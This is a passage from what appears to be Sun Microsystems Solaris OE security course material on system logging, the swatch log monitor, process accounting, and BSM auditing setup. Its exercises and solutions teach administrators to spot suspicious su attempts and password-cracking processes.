The next example logs the message "This is a test of the auth.noticelevel" to the system log at a priority of notice and a facility of auth :

# logger -p auth.notice "This is a test of auth.notice level"



Using the swatch Tool

The swatch tool is a freeware log monitoring tool developed at StanfordUniversity. The swatch tool monitors log files. The tool can filter outunwanted data and can take one or more user-specified actions (forexample, send mail or execute a script) based upon patterns in the log.The swatch tool is written in the Perl programming language and usesPerl syntax in its configuration file.

You can run the swatch tool in three different ways:

● Make a single pass through a file

● Look at messages being appended to a file as that file is updated

● Examine the standard output of a program

To use the swatch tool to continuously monitor a log file, specify the logfile on the command line:

# swatch -t /var/adm/messages



The swatch tool monitors the log file (much like the tail -f ) and looksfor the types of messages you define in the swatch configuration file.Typing swatch without any command line parameters has the same effectas using the tail command on the /var/adm/syslog file.



Configuring the swatch Tool

The swatch tool is controlled by a configuration file. The default locationis $HOME/.swatchrc , but you can use a command line option to changethe default. You can use the command line option to use differentconfiguration files for different log files or when you run the swatch toolfrom the system initialization files in the /etc/init.d directory. Forexample:

# swatch -c /etc/swatch.sulog.conf -t /var/adm/sulog



Each non-comment line (comments start with the # symbol) defines either:

● A pattern expression to watch for, starting with the keywordwatchfor

● Actions to be performed if the previous expression is matched; theselines must start with a tab character

● A pattern expression to ignore, starting with the keyword ignore

A watch or ignore pattern field is a comma-separated list of Perl regularexpression patterns (similar to those used by the UNIX egrep program).The swatch tool builds up its rules in the order that they appear in thefile, so you must place general rules before more specific ones. See theexample swatch configuration file in Code 2-2 on page 2-21.



Using swatch Actions

Table 2-3 shows the actions understood by the swatch tool.

Table 2-3 The swatch Tool Actions

Action Usage

echo Causes the log line to be echoed to the swatch tool’scontrolling terminal or to the /dev/null file (ifstarted from the system startup files in the/etc/init.d file). The line can be echoed indifferent formats by adding one of the followingkeywords to the echo line:● normal

● bold

● underscore

● blinking

● inverse

bell Sends a bell signal (^G) to the controlling terminal.



Code 2-2 shows an example swatch configuration file. Actions mustfollow the watchfor line, and must be indented with a tab character.

Code 2-2 Example swatch Configuration File

1 # Swatch configuration file2 #3 # Alert me of bad login attempts and find out who is on the system4 #5 watchfor /INVALID|REPEATED|INCOMPLETE/6 echo inverse7 bell8 write root9 #10 # Ignore this stuff11 #12 ignore /sendmail/,/nntp/,/xntp|ntpd/,/faxspooler/

ignore Causes the swatch tool to ignore the current line ofinput and proceed to the next one. If used early inthe configuration file, the ignore action can filterout specific, unimportant information that mightotherwise match a more general expression foundlater in the configuration file.

write Uses the write command to send a copy of the lineto a user list.

mail Uses the mail command to send a copy of the lineto a user list.

pipe Runs a user command with pattern matched lines asinput to the particular command.

exec Runs a command on the system. You can useselected fields from the matched line as argumentsfor the command. For example, use the exec actionto invoke a script to send a pager message to asystem administrator.

Table 2-3 The swatch Tool Actions (Continued)

Action Usage



Configuring the swatch tool requires some significant effort. Each log fileto be monitored requires a new swatch program (with its ownconfiguration file). To save time, use the swatch tool in conjunction withthe Syslog utility so that Syslog can collect all the necessary messages to asingle log file.

The swatch tool allows you to configure many types of actions, such assending copies of files and messages to a separate machine or paging asystem administrator. However, to use the swatch tool, you must knowthe Perl patterns.

The best way to use the swatch tool is to include it as part of the systeminitialization in the same directory as the system services, particularlynetwork services (for example, /etc/rc2.d ).

Code 2-3 shows a possible startup script.

Code 2-3 Example swatch Startup Script

1 # startup swatch2 case $1 in3 start)4 /usr/local/bin/swatch -c /etc/swatch.sulog.conf \5 -t /var/adm/sulog&6 /usr/local/bin/swatch -c /etc/swatch.msg.conf \7 -t /var/adm/messages&8 ;;9 stop)10 # terminates when TERM signal sent by shutdown11 ;;12 esac

Solaris OE Monitoring Tools



The Solaris OE provides an array of system utilities designed formonitoring system processes and resources. You can also use these toolsto detect security problems. Many of these tools have overlappingcapabilities or perform similar operations. The commands and utilitiespresented are not comprehensive, but they are commonly used tools.When you have reviewed the available tools, you can select specific toolsfor particular tasks.

For more information about each of the commands and their possibleoptions, consult the appropriate Solaris OE manual pages.



Table 2-4 shows some of the utilities that monitor resources.

Caution – Allowing someone who has not logged in to your system (forexample, someone logging in over the network) to run programs, such aswho and finger , is a security risk. Information about user names can beused by a potential intruder as the basis for an attack on your system.

As the system administrator in charge of security, you should run thesecommands on a regular basis to monitor user activity.

Caution – All these commands can be modified by an experiencedintruder. For example, who and finger use the /var/adm/utmpx file,which should be protected from user modification. Also, a processargument list can be modified to disguise its name and command lineparameters, which can change the information displayed by the pscommand.

Table 2-4 Solaris OE Tools

Tool Description

who Displays who is on the system

whodo Displays who is doing what on the system

w Displays who is on the system and what they aredoing

last Displays user login and logout information

finger Displays information about local and remoteusers

ps Reports process status

prstat Continuously displays process informationsorted by Central Processing Unit (CPU)utilization

sdtprocess Displays process information which can besorted in a number of different ways

kill Terminates or signals a process

vmstat Provides virtual memory statistics

sar Reports on system activity

Process Monitoring Using the top Tool



The top tool is a program that provides continual reports on the state ofthe system. The top tool provides a list of the top CPU-using processes.The top tool’s primary design goals are to:

● Provide an accurate snapshot of the system and process state

● Not be one of the top processes

● Be as portable as possible

The top tool includes an installation configuration script calledConfigure , which must be run before compiling the top tool. TheConfigure script helps choose the correct installation parameters. Youcan also obtain the top tool precompiled from the Sun Freeware Web site(see “Additional Resources” on page 2-3), which avoids the need tomodify the Configure script.



The top tool provides a list of the top CPU-using processes, as shown inCode 2-4.

Code 2-4 Example top Output

last pid: 375; load averages: 0.51, 0.54, 0.24 11:53:5639 processes: 38 sleeping, 1 on cpuCPU states: 99.0% idle, 0.4% user, 0.2% kernel, 0.4% iowait, 0.0% swapMemory: 256M real, 183M free, 28M swap in use, 679M swap free

PID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND368 root 1 48 0 1824K 1144K cpu 0:00 1.24% ksh

340 root 1 59 0 17M 9656K sleep0:01 0.18% Xsun 259 root 6 0 0 2648K 1968K sleep0:01 0.08% vold 356 root 4 59 0 7776K 4920K sleep0:00 0.08% dtgreet 366 root 1 54 0 1760K 1272K sleep0:00 0.04% in.telnetd 202 root 8 43 0 3480K 1776K sleep0:00 0.03% syslogd

375 root 1 50 0 2520K 1576K sleep0:00 0.03% top 278 daemon 4 58 0 10M 5288K sleep0:00 0.02% dwhttpd 363 root 1 58 0 1592K 824K sleep0:00 0.02% in.comsat 177 root 1 45 0 2648K 1912K sleep0:00 0.02% inetd 342 root 17 58 0 2424K 1952K sleep0:00 0.02% mibiisa 341 root 4 51 0 5128K 2520K sleep0:00 0.01% dtlogin 1 root 1 58 0 776K 312K sleep0:00 0.01% init 325 root 7 44 0 3256K 2024K sleep0:00 0.01% dmispd 327 root 3 48 0 4920K 2056K sleep0:00 0.01% dtlogin

Note – The top tool requires read access to all files in the /procdirectory, the memory files /dev/kmem and /dev/mem , and the systemimage /vmunix . This means that the top tool must be installed with thesetuid set to root or only be executable by the root user.

For more information on the top tool, go to:http://www.groupsys.com/top .

The Solaris OE Accounting Package



The Solaris OE accounting package is a suite of programs developed toprovide information about system use, which allows users to be billed forthe amount of system resources they use. Solaris OE accounting consistsof programs and shell scripts that collect data about system use. SolarisOE accounting also provides several analysis reports.

From a security standpoint, the accounting package is another systemmonitoring tool. Only those aspects of accounting which pertain tosecurity are covered in this module. Refer to the manual pages in a SolarisOE if you want to use these facilities for billing purposes.



Why Use the Accounting Package?

The accounting package helps system administrators with the followingfunctions:

● Monitoring system usage

● Troubleshooting

● Monitoring system capacity and performance

● Ensuring data security

The accounting package produces a number of data collection, summary,and report files. You can review these files just like other system log files.Not all files are in plain text, but programs supplied with the accountingpackage can format data files and produce reports (see “AccountingPrograms” on page 2-30).



Process Accounting

Each time a program exits, the accounting kernel places an entry in the/var/adm/pacct file. The entry contains the following information:

● User identifier (UID) and group identifier (GID)

● Process start and end times

● CPU time split between user and kernel space

● Amount of memory used

● Number of characters read and written

● Command name (eight characters)

● The process’s controlling terminal

Use this information to determine what commands a user has executed.You can use this information after a known attack to determine what theintruder was doing. You can also use this information to identifyintrusions. For example, you might become suspicious if a user calleduucp is running any command other than uucico .



You must be aware that process accounting only writes an entry to the fileafter a process exits. Long-running processes, such as password crackers,do not appear until they complete. This means that process accountingcan only detect attacks after the event.

Caution – Process accounting is not auditing. Arguments to commandsare not stored, so it is impossible to track what files or data might havebeen modified. Also, process accounting might record a user running vi ,but you cannot determine whether the user is running the standard viprogram or a different program renamed vi .

Working With the Accounting Package

The accounting package contains programs that are usually run on aregular basis. These programs use information stored in variousaccounting files to generate reports and summaries.

Accounting Programs

Accounting programs are generally placed in an administrative crontabfile. An example crontab entry is shown in “Setting Up Accounting” onpage 2-35. A crontab entry summarizes and analyzes the collected data,then deletes the /var/adm/pacct file. Table 2-5 lists the accountingprograms and their uses.

Table 2-5 Accounting Programs

ProgramName Description

ckpacct Prevents excessive growth (more than 500 KB) ofthe /var/adm/pacct file to avoid unnecessarilyhigh compute times during summarizing.Accounting is halted when free space drops below500 KB in the /var/adm directory.

dodisk Scans the disk and generates a summary of the diskspace currently in use.

runacct Summarizes the raw data collected over the day,deletes the raw data files, and calls the prdailycommand to create a report of the previous day’sactivities.



monacct Generates an overall total from the day’s totals, andcreates a summary report for the entire period.Additionally, the daily reports are deleted and thesummary files reset to zero. As its name suggests, itis intended for monthly accounting but you can useother accounting periods.

Table 2-5 Accounting Programs (Continued)

ProgramName Description



The accounting suite includes several commands. The most useful (from asecurity standpoint) are shown in Table 2-6.

File Locations

The shell scripts and binaries are located in the /usr/lib/acct directory,and the data and report analyses are stored in the /var/adm/acctdirectory.

Table 2-6 Accounting Commands

Command Description

lastlogin Lists all known user names and the date when theseusers last logged in.

prdaily Generates the daily report from the summariescreated by the runnact and dodisk commands. Thereport is located in the/var/adm/acct/sum/rprt mmdd file, where mmddare the month and the day of the report. Usually thiscommand is run by the runnact command fromcrontab entries for the user administrator. See“Setting Up Accounting” on page 2-35.

acctcom Takes input in the format found in the/var/adm/pacct file (or other process accountingfiles) and generates a report on standard output.You can use various options to format andsummarize data.

lastcomm Displays command execution information from the/var/adm/pacct file in reverse chronological order.You can use arguments to restrict the report tosingle users, commands, terminal lines, or betweencertain times.



Types of Accounting Files

Accounting maintains two types of files, collection and summary:

● Collection files – Files containing raw data that is appended by thecurrent process or kernel. The collection files are:

● /var/adm/pacct – Contains an entry file each time that aprocess terminates.

● /var/adm/wtmpx – Contains information on logins and logoutsas well as boot operations and shutdowns.

● /var/adm/acct/nite/disktacct – Entries in diskacct aregenerated by dodisk .

● /var/adm/fee – Used by charging programs



● Summary files and report files – Many files that contain onlysummaries. Reports are created from the summary files. Thesummary and report directories are:

● /var/adm/acct/sum – Contains daily summary files andreports

● /var/adm/acct/fiscal – Contains monthly analyses andsummary files



Setting Up Accounting

Accounting is installed with the standard Solaris OE installation. Toensure that it starts automatically at boot time, follow these steps:

1. Install the /etc/init.d/acct script as the start script and at runlevel 2.

# ln /etc/init.d/acct /etc/rc2.d/S22acct

2. Install the/etc/init.d/acct script as the stop script and at runlevel 0.

# ln /etc/init.d/acct /etc/rc0.d/K22acct# ln /etc/init.d/acct /etc/rc1.d/K22acct# ln /etc/init.d/acct /etc/rcS.d/K22acct



3. Modify the crontab files for users admand root so that the dodisk ,ckpacct , runacct , and monacct programs (if required) startautomatically.

# crontab -l root30 22 * * 4 /usr/lib/acct/dodisk# crontab -l adm0 * * * * /usr/lib/acct/ckpacct30 2 * * * /usr/lib/acct/runacct 2> /var/adm/acct/nite/fd2log30 7 1 * * /usr/lib/acct/monacct

4. Reboot the system or run the /etc/rc2.d/S22acct start program.



Starting and Stopping the Accounting Package

The init command should start the accounting package automatically.However, you can start the accounting package manually using the/usr/lib/acct/startup shell script.

When the accounting package is started, a new /var/adm/pacct file iscreated. The old file is renamed /var/adm/pacct N, where N is an integerthat is incremented each time the pacct file is replaced.

Note – Accounting can consume vast amounts of disk space on busysystems. Make sure that adequate space is provided in the /var/admdirectory and that the overnight batch programs described in“Accounting Programs” on page 2-30 are run to summarize data on adaily and monthly basis. Accounting switches off automatically if the/var/adm directory runs short of space.

You can stop the accounting package using the command:

/usr/lib/acct/shutacct [" reason for stopping "]

This command writes an entry (including the reason, if supplied) in the/var/adm/wtmpx file.

Exercise: Using Logging as a Security Tool




● Study standard log files and tool output looking for potentialsecurity issues

● Enable higher levels of logging for authorization activities

● Enable system accounting

Preparation

Ensure that you have installed the GNU C++ compiler and the makeutility.

Tasks

The first two tasks ask you to look at log files to determine if there are anypotential security problems. (Hint: Because this is a security course, youcan expect there to be problems – the trick is to identify what theproblems are.)

The remaining tasks ask you to add different levels of logging to yoursystem. If you are not confident about what to do having studied thequestion and read the online manual pages, then step-by-step instructionsare provided in the answers section at the end of this module.

You are not required to finish all of the tasks in the time allocated by theinstructor.

Task – Sample sulog Commentary File

Study the sample /var/adm/sulog file on your system to identifypossible security problems.



Task – Studying Processes

Look at the following output from the top command:

last pid: 668; load averages: 0.29, 0.07, 0.0409:59:0141 processes: 39 sleeping, 1 running, 1 on cpuCPU states: 0.0% idle, 99.0% user, 1.0% kernel, 0.0% iowait, 0.0%swapMemory: 256M real, 175M free, 34M swap in use, 672M swap free

PID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND667 root 1 40 0 6512K 6080K run 0:18 59.36% john668 root 1 58 0 2520K 1576K cpu 0:00 0.95% top480 root 1 58 0 976K 712K sleep 0:00 0.87% cracker367 root 1 48 0 1824K 1144K sleep 0:00 0.03% ksh378 root 1 48 0 1824K 1152K sleep 0:00 0.02% ksh341 root 12 58 0 2384K 1912K sleep 0:01 0.00% mibiisa259 root 6 0 0 2648K 1968K sleep 0:01 0.00% vold339 root 1 59 0 17M 9704K sleep 0:01 0.00% Xsun257 root 1 23 0 1576K 688K sleep 0:00 0.00% cimomboot183 root 1 31 0 1896K 1264K sleep 0:00 0.00% lockd53 root 7 33 0 1280K 784K sleep 0:00 0.00% devfseventd277 daemon 3 34 0 9704K 2488K sleep 0:00 0.00% dwhttpd376 root 1 38 0 1760K 1280K sleep 0:00 0.00% in.telnetd55 root 3 42 0 2288K 936K sleep 0:00 0.00% devfsadm202 root 8 43 0 3480K 1768K sleep 0:00 0.00% syslogd324 root 5 44 0 3160K 2080K sleep 0:00 0.00% dmispd

Do any of these processes need further investigation?



Task – Enabling the Syslog Facility to Report suCommand Activity

In this task, you configure system logging to report use of the sucommand.

1. Read the Solaris OE manual pages for the su and syslog.confcommands to enable logging of su authentication to a new log filecalled /var/adm/sc300log . You must create this log file beforereconfiguring the syslogd facility:

touch /var/adm/sc300log

2. To test your changes, use the su command to change to another user(such as alice ), and then use su again to change identity to root ,but supply a wrong password, and then check these files:

/var/adm/sc300log/var/adm/sulog

Task – Enabling the Syslog Facility to Report FailedLogin Activity

In this task, you configure system logging to report failed login attempts.

1. Read the Solaris OE manual pages for the login and syslog.confcommands to enable logging of failed login attempts.

2. Use telnet to login to your workstation as any user but supply aninvalid password, and then check the sc300log file.

Task – Enabling ftp to Report Logins

In this task you will configure system logging of ftp logins.

1. Read the Solaris OE manual page for the in.ftpd command andenable ftp to report user logins (you must update the/etc/syslog.conf and /etc/inetd.conf files).

2. Run ftp to connect to your workstation. Check that an entry appearsin the /var/adm/sc300log file.



Task – Using the swatch Tool

Because this is the first third-party tool that you configure, this task takesyou through the process one step at a time. The swatch tool is a littlemore complex to install than most tools.

The swatch download site is listed in “Additional Resources” onpage 2-3. A copy of the download file (swatch.tar ) is also in the/usr/local/pkg directory.

The swatch tool is a Perl program which uses some standard Perl CPANlibraries which are not included in the swatch.tar file. These can bedownloaded from http://www.perl.com . The required modules are:

Time::HiResDate::CalcDate::FormatFile::Tail

These modules are also included in the /usr/local/pkg directory.

To install the Perl modules:

1. Create a working directory called /usr/local/cpan and unpack thePerl modules into that directory:

# mkdir -p /usr/local/cpan# cd /usr/local/cpan# tar -xof ../pkg/Date-Calc-4.3.tar# tar -xof ../pkg/File-Tail-0.98.tar# tar -xof ../pkg/TimeDate-1.10.tar# tar -xof ../pkg/Time-HiRes-01.20.tar

You have created four subdirectories, one for each module.

2. Change directory (cd) to each directory, and then run the followingcommands to build and install the Perl modules:

# cd perl-module-directory# perl Makefile.PL# make# make test# make install

3. Install the swatch tool in the /usr/local directory:

# cd /usr/local# tar xvf pkg/swatch.tar



This creates a subdirectory called swatch-3.0.1.

4. Before continuing, read the READMEfile in the swatch directory butdo not perform any of the actions in the READMEfile. Follow thesesteps and compare these instructions to those in the swatch READMEfile.

# cd /usr/local/swatch-3.0.1# perl Makefile.PL# make# make test# make install# make realclean

5. The swatch tool requires a configuration file to determine what tolook for and how to react to what is found (for example, send amessage, email, or execute a program). You can find exampleconfiguration files in the /usr/local/swatch-3.0.1/examplesdirectory. As a test, create a file called ~/.swatchrc with thefollowing contents:

1 #bad logins2 watchfor /auth.crit|auth.notice/3 echo inverse4 bell 25 write root

This file uses the write command to notify all root logins about badlogins or failed su command attempts.

6. Start the swatch utility to monitor the output from the/var/adm/sc300log file created in the previous exercises using:

./swatch -t /var/adm/sc300log

7. Use the telnet or su commands from another shell window toattempt to break-in to the system (use a bad password so that theattempt fails). It might take a couple of minutes before the swatchmessage appears in the swatch window and all other shell windowsowned by the root user. The swatch utility polls the log files on aregular basis (approximately every two minutes), so you will not seeany response until the next polling interval.



Task – Starting Process Accounting

Follow the steps below, which ensure that accounting starts at boot timeand that accounting programs run automatically:

1. Enable accounting startup and shutdown as part of the system bootprocess:

# cd /etc# ln init.d/acct rc2.d/S22acct# ln init.d/acct rc1.d/K22acct# ln init.d/acct rcS.d/K22acct# ln init.d/acct rc0.d/K22acct

2. Manually start accounting:

# sh /etc/init.d/acct start

3. Add report generation commands to the crontab entry for the admuser:

# crontab -e adm# controls account file size30 3 * * * /usr/lib/acct/ckpacct# process daily report data30 4 * * * /usr/lib/acct/runacct 2> /var/adm/acct/nite/fd2log# generate monthly reports30 5 1 * * /usr/lib/monacct

4. Add the disk report command to the root crontab entry:

crontab -e# generate raw disk usage report30 23 29 * 6 /usr/lib/acct/dodisk

You can view the accounting reports tomorrow after the overnightjobs have generated the summary data. Currently you can view theprocess accounting file using the acctcom command, whichsummarizes process data for all processes started since accountingwas enabled.



5. Try the following commands:

# acctcom | more# acctcom -n vi | more# acctcom -n ksh | more# acctcom -r -n ksh| more# acctcom -k -n ksh| more

Read the Solaris OE manual pages for the acctcom command formore information and additional command-line options.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following show example sulog files and indicate the potentialsecurity threats that you should have identified.

Sample sulog Commentary File

1 SU 02/28 16:31 + console root-daemon2 SU 02/28 16:51 + console root-daemon3 SU 02/28 16:55 + pts/4 root-bob4 SU 02/28 17:00 + pts/4 root-alice5 SU 02/28 17:02 + pts/4 root-eve

This is testing the account setup for bob , alice , and eve :

6 SU 02/28 17:07 + pts/5 bob-root7 SU 02/28 17:21 + console root-daemon8 SU 03/29 14:20 + console root-daemon9 SU 04/04 09:52 + console root-daemon10 SU 04/05 08:55 + console root-daemon11 SU 04/05 08:59 + pts/2 bob-root12 SU 04/05 09:13 - pts/2 bob-alice

Why is user bob using the su command to try to access the aliceaccount?

13 SU 04/10 09:10 + console root-daemon14 SU 04/10 09:24 + pts/2 bob-root15 SU 04/10 09:25 + pts/2 root-alice

Here is user bob again. Should he have root access and why is he usingthe su command to try to become the user alice ?

16 SU 04/10 10:14 + pts/2 bob-root17 SU 04/10 11:24 + pts/3 alice-root18 SU 04/10 14:46 + pts/2 bob-root19 SU 04/10 14:46 + pts/2 bob-root20 SU 04/12 13:50 + console root-daemon21 SU 04/12 14:42 + pts/2 alice-root22 SU 04/12 14:42 + pts/2 alice-root23 SU 04/12 14:43 + pts/2 root-bob24 SU 04/12 14:43 - pts/4 eve-root

Exercise Solutions


Why is there no successful use of the su command by the user eveshown? Was the attempt a mistake or did the eve user think she had theroot password?

25 SU 04/12 15:10 + pts/3 bob-root26 SU 04/12 15:25 - pts/2 alice-root27 SU 04/12 15:25 + pts/3 bob-root28 SU 04/12 15:25 - pts/3 alice-root29 SU 04/12 15:26 + pts/3 alice-root

After three tries, alice remembers the root password.

30 SU 04/13 08:46 + console root-daemon31 SU 04/13 09:34 - pts/4 eve-root32 SU 04/13 09:34 - pts/4 eve-root33 SU 04/13 09:34 - pts/4 eve-root34 SU 04/13 09:34 - pts/4 eve-root35 SU 04/13 09:35 - pts/4 eve-root36 SU 04/13 09:35 - pts/2 bob-root37 SU 04/13 09:35 - pts/4 eve-root38 SU 04/13 09:35 + pts/2 bob-root

It took two attempts before user bob successfully used the su command tobecome the root user.

39 SU 04/13 09:35 - pts/4 eve-alice40 SU 04/13 09:35 - pts/4 eve-alice41 SU 04/13 09:36 - pts/4 eve-alice

It looks like eve is trying to break into the system.

Studying Processes

The first line shows a CPU-intensive process called john . This is a naiveuser running John the Ripper, a well-known password-cracking program.

Note – A sophisticated user would have disguised the program name andtaken steps to reduce the CPU footprint by lowering the process priority.

Perhaps less obvious than John the Ripper is the program cracker whichuses less CPU time than the top tool. This is the infamous crack programwhich also attempts to break passwords; the crack program runs at alower priority so it is not as obvious (but does take longer to detectpasswords). Often the cracker process does not even appear in the top 20processes listed.

Exercise Solutions


The remaining processes are all standard system processes. How do youknow this? Only with experience and comparison of top output fromdifferent systems.

Enabling the Syslog Facility to Report su CommandActivity

The following are the steps necessary to enable logging of su commandactivity:

1. Add the following line to the /etc/syslog.conf file:

auth.crit;auth.notice;auth.info /var/adm/sc300log

2. Create the log file and reconfigure the syslogd facility:

# touch /var/adm/sc300log# kill -HUP pid for syslogd

3. Check that the /etc/default/su file has:

SYSLOG=YES

Enabling the Syslog Facility to Report Failed LoginActivity

The following are the steps necessary to enable logging for failed logins:

1. Ensure that the /etc/syslog.conf file contains the following linefrom the previous exercise:


2. Check that the /etc/default/login file has:

SYSLOG=YESSYSLOG_FAILED_LOGINS=0

Exercise Solutions


Enabling ftp to Report Logins

The following are the steps necessary to enable logging for ftp logins:

1. Update the /etc/syslog.conf file so that the new log line reads:

auth.crit;auth.notice;auth.info;daemon.info /var/adm/sc300log

2. Edit the /etc/inetd.conf file to set the ftp line to include a -lswitch:

ftp stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd -l

3. Send the hang-up signal to the inetd daemon to get it to reread itsconfiguration file:

kill -HUP pid for inetd

Using the swatch Tool


Starting Process Accounting



Module 3

The Solaris OE Basic Security Module

Objectives


● Implement auditing using the Solaris OE Basic Security Module(BSM)

● Use the BSM to log user and kernel events

● Locate and configure the necessary administrative files to implementdevice allocation functionality

● Allocate and de-allocate shared devices

Relevance


Relevance

?!

Discussion – The following questions are relevant to understandingsecurity in the Solaris OE:

● The Solaris OE has many built-in utilities that can log user activities.Is there a need for something more? In particular, can you track, indetail, a specific user’s activities?

● Your systems might have numerous attached devices such as tapedrives and floppy disk drives. Can you foresee dangers in allowingunrestricted access to these devices?

● Can you prevent users from overwriting your backup tapeswhen they are in the tape drive?

● Can you prevent non-trusted user access to your removablemedia devices?

● Can you ensure the validity of data copied onto removablemedia?


The Solaris OE Basic Security Module 3-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Solaris™ OE system administration collection. SunSHIELD BasicSecurity Module Guide. Part Number 806-1789-10.

● Solaris™ OE AnswerBook, Version 2.

● Solaris OE manual pages – allocate(1M) , attributes(5) ,auths(1) , audit(1M) , auditd(1M) , auditconfig(1M) ,audit.log(4) , audit_class(4) , audit_control(4) ,audit_user(4) , audit_warn(1M) , auditreduce(1M) ,bsmconv(1M) , deallocate(1M) , device_allocate(4) ,device_maps(4) , dminfo(1M) , list_devices(1M) , andpraudit(1M)

Solaris OE Basic Security Module Auditing



The Solaris OE can be configured to be Orange Book compliant at the C2level of trust. One of the C2 requirements is that a comprehensive level ofactivity auditing takes place.

Auditing makes it possible to:

● Monitor security-relevant events that take place on the system

● Record the events in an audit trail

● Detect misuse or unauthorized activity (by analyzing the audit trail)

Auditing can also serve as a deterrent. If users know that their actions arelikely to be audited, they might be less likely to attempt maliciousactivities. The SunSHIELD™ Basic Security Module (BSM) provides anauditing utility that can produce C2-level logging.



Successful auditing depends on two security features: identification andauthentication. At login, after a user supplies a user name and password,a unique audit ID is associated with the user's initial process. The audit IDis inherited by every process started during the login session. Even if auser changes identity with the su command, all actions performed aretracked with the same audit ID. During system configuration, you selectwhich activities to monitor, and fine-tune the degree of auditing done forindividual users.

After audit data is collected, audit-reduction and interpretation tools allowthe examination of interesting parts of the audit trail. For example, youcan choose to look at audit records for individual users or groups, look atall records for a certain type of event on a specific day, or select recordsgenerated at a certain time of day.

Note – Use caution when choosing what to audit. The volume of dataBSM produces can be an issue due to the large amount of disk spacerequired for fully detailed logging.

In addition to process-based security risks, there are security risksassociated with access to data stored on various input/output (I/O)devices. BSM has a device-allocation mechanism that allows anadministrator to restrict the ways in which such devices are used andtherefore minimize the security risks. The BSM device-allocationmechanism fulfills the object reuse requirements for computing systems atthe C2 level.



Identifying Major BSM Components

BSM has two logical subsystems, security auditing and device allocation:

● Security auditing:

● Depends on identification and authentication

● Assigns a unique audit ID per session

● Records user activity

● Can select users, activities, or both to audit

● Device allocation:

● Controls access to devices

● Prevents unauthorized reading of, or writing to, physical media



Using Security Auditing

The security auditing feature is best understood when examined from acomponent level. The primary component of this subsystem is a daemonprocess known as /usr/sbin/auditd .

The major functions performed by the auditd daemon are to:

● Open and close audit log files in specified directories

● Extract audit data from the kernel and record it in an audit log

● Communicate administrative or operational failures using the/etc/security/audit_warn script

A command-line interface handles administrative controls.



Categorizing Audit Events

Any system action capable of being audited is a BSM audit event. Theseevents are usually initiated by the logged-in user and might have securityrelevance. All audited events are one line entries in the/etc/security/audit_event file. These audit events are furthercategorized as follows:

● Kernel events

● User-level events

Each event is given a:

● Number identifier ranging from 1 to 2047 for kernel events, and from2048 to 65535 for user events.

● Name identifier events begin with AUE_followed by either asequence of uppercase letters for kernel events or by a sequence oflowercase letters for user events.

For example, the event number for the creat() system call is 4 and theevent name is AUE_CREAT, while the event number for the user programinetd is 6151 and the event name is AUE_inetd_connect .



Assigning Events to Audit Classes

Each audit event belongs to one or more audit classes. You can configurethe audit subsystem to log only certain classes of events. Assigning eventsto classes makes it easier to handle large numbers of events. When you usea class, you address all of the events in that class.

Thirty-two possible classes can be defined for grouping audit events.Eighteen are defined by default inside the /etc/security/audit_classfile. You can add new classes up to the maximum of 32.



Interpreting Audit Records

When auditing is enabled, audit records are collected in a trail. The trail isa binary file often referred to as the audit.log file; however, the literalfile name is identified by the contents of the /etc/security/audit_datafile. The logs are usually kept in the /var/audit directory.

Each audit record describes the occurrence of a single audited event.These records contain the following information:

● What user initiated the action or event

● What action was attempted

● Which files were affected

● Where and when it occurred

Note – See the SunSHIELD™ Basic Security Module Guide and theSolaris OE manual pages about the audit.log file for more informationregarding the interpretation of all of the fields.



Enabling BSM

The steps required to set up the environment for auditing are:

1. Execute the /etc/security/bsmconv utility.

# cd /etc/security# ./bsmconv

2. Edit the /etc/security/audit_startup file, if required.

Use the auditconfig utility to set the kernel policy +cnt . Hereprocesses are not suspended when audit resources are exhausted.Instead, audit records are dropped.

# cat audit_startup#!/bin/shauditconfig -setpolicy +cnt

3. Reboot your operating system.



If you use device allocation there is a conflict with BSM and the voldvolume management daemon. To avoid this conflict, the bsmconv scriptmoves the volmgt daemon out of the rc2.d start-up scripts. Do not runvold and BSM because the device allocation mechanisms conflict.

Caution – The bsmconv script adds a line to the /etc/system file todisable the ability to abort the system using the Stop-A keyboardsequence. To retain the ability to abort the system using the Stop-Akeyboard sequence, comment out the line that reads “set abort_enable= 0” in the /etc/system file.

The bsmconv script creates a script that automatically starts the auditddaemon process during system initialization. The file name for this scriptis /etc/security/audit_startup .

This script assists in providing default configuration and audit policyinformation. The /etc/security directory represents the anchordirectory for the auditd process.

The following audit_startup file uses the auditconfig utility to set thekernel policy +cnt . This policy ensures that processes are not suspendedwhen audit resources are exhausted. Instead, audit records are dropped.

# cat audit_startup#!/bin/shauditconfig -setpolicy +cnt

See the Solaris OE manual page covering the auditconfig utility for moreinformation on setting audit parameters.



Disabling BSM

To disable BSM:

1. Use the /etc/security/bsmunconv utility.

2. Reboot the system.

This script removes the audit_startup script, removes cron and atjobs, and restores the volume management init.d file.

Caution – The bsmunconv script removes the line in the /etc/systemfile that disables the ability to abort the system using the Stop-A keyboardsequence. If you want the ability to abort the system using the Stop-Akeyboard sequence after running the bsmunconv script to remain disabled,reenter a line that reads “set abort_enable = 0 ” in /etc/system .

Creating an Audit Trail Using BSM



Before you initiate auditing, you must configure what gets audited, bothsystem wide and for individual users.

Setting Audit Flags

Audit flags indicate classes of events to audit. System wide defaults for allusers are in the /etc/security/audit_control file. In addition, you cancustomize what gets audited at the user level. This level of customization isdefined in the file /etc/security/audit_user file.



The audit_control Log Entries

The audit_control file contains a series of configuration lines. Each lineis colon separated with the first field defining a configurable parameterand the second field defining a parameter-specific configuration.



The audit_control Flag Entries

Table 3-1 shows example configuration parameters.

Table 3-1 Audit Control Parameters

Control Description

dir Directory in which to store audit logs. Can bespecified multiple times to define alternate audit logdirectories.

minfree Remaining percentage of free space allowed in anaudit directory before switching to an alternatedirectory.

flags Comma-separated list of audit flags enabled foractions that can be assigned to a specific user.

naflags Comma-separated list of audit flags enabled foractions that cannot be assigned to a specific user.



Table 3-2 shows some examples of audit flags that correspond to defaultclasses.

Table 3-2 Audit Flags

Short Full name Description

fr file_read Reading data, opening a file forreading, and so on

fw file_write Writing data, opening a file forwriting, and so on

fa file_attr_acc Access of object attributes:stat , pathconf , and so on

fm file_attr_mod Change of object attributes:chown, flock , and so on

fc file_creation Creation of object

fd file_deletion Deletion of object

cl file_close A close(2) system call

pc process Process operations: fork , exec ,exit , and so on

nt network Network events: bind ,connect , accept , and so on

ip ipc System V IPC operations

